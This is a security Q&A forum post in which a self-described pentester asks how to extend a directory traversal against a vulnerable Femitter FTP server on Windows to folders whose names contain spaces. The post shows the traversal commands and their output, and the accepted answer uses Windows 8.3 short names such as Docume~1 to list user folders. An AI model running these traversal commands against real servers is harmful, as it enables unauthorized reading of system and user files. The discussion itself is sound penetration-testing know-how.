FTP directory traversal attack on directories containing white spaces

attack-vectorftp

I am conducting a sanctioned pentest in a closed reference environment, and struggled upon a seemingly simple issue, I currently cannot solve.

When attempting to execute a directory traversal attack against a vulnerable Fermitter FTP server running on MS Windows OS, it is possible to do a LIST on system root (addresses and content listings changed here for reference only):

# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root): 
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
-rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Documents and Settings
dr--r--r--   1 ftp      ftp            0 Sep 23  2015 Program Files
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 WINDOWS
226 File sent ok

However, if I want to list the contents of a folder containing white spaces such as Documents and settings, I am not able to list the directory contents because of whites spaces being ignored.

ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok

I already tried using different FTP clients (CLI and GUI, on Linux and Windows) and either they ignore white spaces or disallow directory traversal.

Also tried scripting the attack on Python by using at first raw sockets and then ftplib to send the commands in HEX format directly to the FTP server, but with no success.

Googling for couple of hours did not yield a working solution (yes, there were a lot of options, which did not work), that is why there is someone here, who has had the same issue. Pretty sure, that this is not the first time such a directory traversal with white spaces is needed.

Best Answer

Solution suggested by @Dogeatcatworld to use MS Windows directory short notation such as C:\Docume~1\.

ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 26  2015 Administrateur
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 All Users
226 File sent ok

Really good article from MS Knowledge Base explains the 8.3 directory notation: How Windows Generates 8.3 File Names from Long File Names

Related Question